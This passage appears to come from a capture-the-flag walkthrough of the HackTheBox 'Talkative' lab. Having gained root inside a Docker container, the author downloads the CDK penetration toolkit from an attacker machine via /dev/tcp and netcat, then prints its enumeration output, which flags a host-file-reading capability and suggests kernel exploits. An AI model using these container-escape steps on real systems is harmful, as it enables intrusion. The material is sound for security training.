Docker Container
After successfully making lateral movement to the Docker host, 172.17.0.3, I started searching for clues to breakout
root@c150397ccd63:/app/bundle/programs/server# find . -name docker* -ls -type f 2>/dev/null
279302 8 -rwxr-xr-x 1 rocketchat rocketchat 4218 Oct 26 1985 ./node_modules/node-gyp/test/docker.sh
527000 4 drwxr-xr-x 2 rocketchat rocketchat 4096 Dec 19 2020 ./npm/node_modules/codemirror/mode/dockerfile
527001 8 -rw-rw-r-- 1 rocketchat rocketchat 4739 Dec 19 2020 ./npm/node_modules/codemirror/mode/dockerfile/dockerfile.js
528986 4 -rw-rw-r-- 1 rocketchat rocketchat 523 Dec 19 2020 ./npm/node_modules/highlight.js/lib/languages/dockerfile.js
I don’t see Docker configuration files. It is entirely possible that those are removed for security
In this case, I’d need other ways to enumerate the container
cdk - Zero Dependency Container Penetration Toolkit
CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.
root@c150397ccd63:/root# cat < /dev/tcp/10.10.14.9/999 > cdk
┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ nc -lvp 999 < cdk
listening on [any] 999 ...
connect to [10.10.14.9] from talkative.htb [10.10.11.155] 56002Delivery complete
root@c150397ccd63:/root# chmod 755 ./cdk
root@c150397ccd63:/root# ./cdk evaluate --full
CDK (Container DucK)
CDK Version(GitCommit): d9ab55702036c28e793378cc47605e21206dfef1
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/
[ Information Gathering - System Info ]
2023/06/08 22:29:00 current dir: /root
2023/06/08 22:29:00 current user: root uid: 0 gid: 0 home: /root
2023/06/08 22:29:00 hostname: c150397ccd63
2023/06/08 22:29:00 debian debian 10.10 kernel: 5.4.0-81-generic
2023/06/08 22:29:00 Setuid files found:
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/bin/mount
/bin/su
/bin/umount
[ Information Gathering - Services ]
2023/06/08 22:29:00 sensitive env found:
DEPLOY_METHOD=docker-official
[ Information Gathering - Commands and Capabilities ]
2023/06/08 22:29:00 available commands:
find,node,npm,apt,dpkg,mount,fdisk,base64,perl
2023/06/08 22:29:00 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
CapInh: 0000000000000000
CapPrm: 00000000a80425fd
CapEff: 00000000a80425fd
CapBnd: 00000000a80425fd
CapAmb: 0000000000000000
Cap decode: 0x00000000a80425fd = CAP_CHOWN,CAP_DAC_READ_SEARCH,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_MKNOD,CAP_AUDIT_WRITE,CAP_SETFCAP
Added capability list: CAP_DAC_READ_SEARCH
[*] Maybe you can exploit the Capabilities below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[ Information Gathering - Mounts ]
0:74 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/SJ7L7M7IXKP2LYEKIS4QTXWMB2:/var/lib/docker/overlay2/l/V56NO5353KGHEUPU2G64UYICZS:/var/lib/docker/overlay2/l/57PYNL7JWAUZ2ZEF5CM7JKTH2Y:/var/lib/docker/overlay2/l/K4DCIUMHCNYT3RFVQSR7KCCWLJ:/var/lib/docker/overlay2/l/LLNI6XKILGAYVK3VSFPKZQC4NI,upperdir=/var/lib/docker/overlay2/5de14f4c9bdeaf0f8a19d03adcc2d28ccc97655bb5bc5f888490c184d2ad70dc/diff,workdir=/var/lib/docker/overlay2/5de14f4c9bdeaf0f8a19d03adcc2d28ccc97655bb5bc5f888490c184d2ad70dc/work,xino=off
0:76 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:77 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:78 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:79 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:80 / /sys/fs/cgroup rw,nosuid,nodev,noexec,relatime - tmpfs tmpfs rw,mode=755
0:31 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/systemd ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,xattr,name=systemd
0:34 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/hugetlb ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,hugetlb
0:35 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/cpu,cpuacct ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpu,cpuacct
0:36 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/perf_event ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,perf_event
0:37 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/blkio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,blkio
0:38 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/memory ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory
0:39 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/net_cls,net_prio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,net_cls,net_prio
0:40 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/freezer ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,freezer
0:41 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/devices ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,devices
0:42 / /sys/fs/cgroup/rdma ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,rdma
0:43 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/pids ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,pids
0:44 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/cpuset ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuset
0:75 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:81 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k
253:0 /var/lib/docker/volumes/ae091a7d3837f61e227c2d406f85a574d8a9e97f5909929902d7c20ce630deae/_data /app/uploads rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/lib/docker/containers/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/lib/docker/containers/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726/hostname /etc/hostname rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/lib/docker/containers/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726/hosts /etc/hosts rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
0:76 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:76 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:76 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:76 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:76 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:89 / /proc/acpi ro,relatime - tmpfs tmpfs ro
0:77 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:77 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:77 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:77 /null /proc/sched_debug rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:90 / /proc/scsi ro,relatime - tmpfs tmpfs ro
0:91 / /sys/firmware ro,relatime - tmpfs tmpfs ro
[ Information Gathering - Net Namespace ]
container net namespace isolated.
[ Information Gathering - Sysctl Variables ]
2023/06/08 22:29:00 net.ipv4.conf.all.route_localnet = 0
[ Information Gathering - DNS-Based Service Discovery ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 1.1.1.1:53: read udp 172.17.0.3:37437->1.1.1.1:53: i/o timeout
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 1.1.1.1:53: read udp 172.17.0.3:50775->1.1.1.1:53: i/o timeout
[ Discovery - K8s API Server ]
2023/06/08 22:29:20 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
api-server forbids anonymous request.
response:
[ Discovery - K8s Service Account ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
[ Discovery - Cloud Provider Metadata API ]
2023/06/08 22:29:21 failed to dial Alibaba Cloud API.
2023/06/08 22:29:22 failed to dial Azure API.
2023/06/08 22:29:23 failed to dial Google Cloud API.
2023/06/08 22:29:24 failed to dial Tencent Cloud API.
2023/06/08 22:29:25 failed to dial OpenStack API.
2023/06/08 22:29:26 failed to dial Amazon Web Services (AWS) API.
2023/06/08 22:29:27 failed to dial ucloud API.
[ Exploit Pre - Kernel Exploits ]
2023/06/08 22:29:27 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-27365] linux-iscsi
Details: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
Exposure: less probable
Tags: RHEL=8
Download URL: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[ Information Gathering - Sensitive Files ]
.dockerenv - /.dockerenv
/config.json - /app/bundle/programs/server/config.json
.token - /app/bundle/programs/server/npm/node_modules/grpc/node_modules/protobufjs/docs/ProtoBuf.DotProto.Tokenizer.html
/config.json - /app/bundle/programs/server/npm/node_modules/url-polyfill/tests/config.json
/.bashrc - /etc/skel/.bashrc
/.bashrc - /root/.bashrc
/.bash_history - /tmp/.bash_history
[ Information Gathering - ASLR ]
2023/06/08 22:29:31 /proc/sys/kernel/randomize_va_space file content: 2
2023/06/08 22:29:31 ASLR is enabled.
[ Information Gathering - Cgroups ]
2023/06/08 22:29:31 /proc/1/cgroup file content:
12:cpuset:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
11:pids:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
10:rdma:/
9:devices:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
8:freezer:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
7:net_cls,net_prio:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
6:memory:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
5:blkio:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
4:perf_event:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
3:cpu,cpuacct:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
2:hugetlb:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
1:name=systemd:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
0::/system.slice/containerd.service
2023/06/08 22:29:31 /proc/self/cgroup file added content (compare pid 1) :Executing CDK
CAP_DAC_READ_SEARCH is available
Moving on to the Privilege Escalation phase